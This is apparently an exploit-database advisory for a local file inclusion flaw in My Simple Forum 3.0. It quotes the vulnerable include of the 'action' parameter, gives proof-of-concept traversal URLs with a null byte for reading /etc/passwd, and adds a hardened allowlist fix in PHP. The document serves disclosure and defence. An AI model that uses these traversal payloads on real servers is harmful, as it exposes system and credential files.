Vendor: My Simple Forum
By: cOndemned
CVSS: 7.5 (HIGH)
Vulnerability: Local File Inclusion
CWE: 22
Product Name: My Simple Forum
Affected Version From: 3
Affected Version To: 3
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability

My Simple Forum 3.0 is vulnerable to local file inclusion because the 'action' parameter in index.php is not sanitized. An attacker can exploit this by sending a crafted HTTP request whose 'action' parameter contains directory traversal sequences (e.g. '../../../../../../../etc/passwd%00') to the vulnerable server, which allows the attacker to read arbitrary files from the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of My Simple Forum.

Exploit-DB raw data:

/*

	$Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $

	My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability
	Bug discovered by cOndemned

	Script download: http://drennansoft.com/index.php?action=download&id=1

	Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura

*/


Source of index.php:

	49.	if(file_exists('site/'.$_GET['action'].'.php')) {
	50.	include('site/'.$_GET['action'].'.php');
	51.	} else {
	
	local file inclusion on line 50
	

Proof of concept:

	http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00
	http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00

# milw0rm.com [2008-12-04]
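
A hardened form of the dispatch on lines 49-51 of index.php, as an added example that is not part of the advisory or of the vendor's patch: the 'action' value is matched against a fixed allowlist and the resolved path is confirmed to stay under site/. The function name resolve_action, the page names and the temporary demo directory are assumptions, and the sample inputs are constructed.

```php
<?php
declare(strict_types=1);

// Added example (PHP 7.1+). resolve_action() and the page names are hypothetical.
// Returns the canonical path of an allowed page under $siteDir, or null.
function resolve_action($action, array $allowed, string $siteDir): ?string
{
    // Reject arrays (?action[]=x), NUL bytes, dots and slashes: plain names only.
    if (!is_string($action) || preg_match('/\A[a-z0-9_]{1,32}\z/', $action) !== 1) {
        return null;
    }
    // Allowlist: only pages the application actually ships.
    if (!in_array($action, $allowed, true)) {
        return null;
    }
    // Defence in depth: the canonical path must exist and stay under $siteDir.
    $base = realpath($siteDir);
    $path = realpath($siteDir . '/' . $action . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway site/ directory holding one stub page.
$site = sys_get_temp_dir() . '/msf_demo_' . getmypid();
mkdir($site);
file_put_contents($site . '/forum.php', "<?php // stub page\n");
$allowed = ['forum', 'topic'];   // hypothetical page names

// Constructed inputs: valid page, traversal, NUL suffix, missing file, array.
$samples = ['forum', '../../../../etc/passwd', "forum\0", 'topic', ['x']];
foreach ($samples as $s) {
    $path = resolve_action($s, $allowed, $site);
    printf("%-30s => %s\n",
        json_encode($s, JSON_UNESCAPED_SLASHES),
        $path === null ? 'rejected (serve 404)' : 'include ' . basename($path));
}

unlink($site . '/forum.php');
rmdir($site);
```

In a dispatcher, the caller would include the returned path only when it is non-null and send an error page otherwise, so request data never reaches include() directly.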